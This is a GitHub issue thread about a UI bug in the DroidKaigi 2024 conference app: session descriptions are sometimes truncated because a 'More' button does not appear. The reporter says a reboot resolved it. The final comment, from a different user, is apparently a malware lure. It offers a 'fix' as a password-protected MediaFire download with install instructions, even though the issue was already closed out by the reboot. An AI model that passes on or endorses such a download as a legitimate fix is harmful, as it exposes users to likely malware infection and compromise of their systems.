### ISSUE TITLE
[Bug] In TimetableItemDetailContent, Sometimes not all Descriptions can be displayed.

### ISSUE THREAD

**Issue by kosenda** [DroidKaigi/conference-app-2024#899]
## Overview
Although the cause has not been determined, the More button should appear when it is omitted, but it does not, which may cause the description to be only partially visible. However, if you reduce or increase the font size on your device, the More button will appear.

## Video
https://github.com/user-attachments/assets/9bb07e63-60cc-4dd0-a196-c4a35a471255

**Comment by kosenda** [comment]
Sorry! Rebooting has resolved the issue!

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
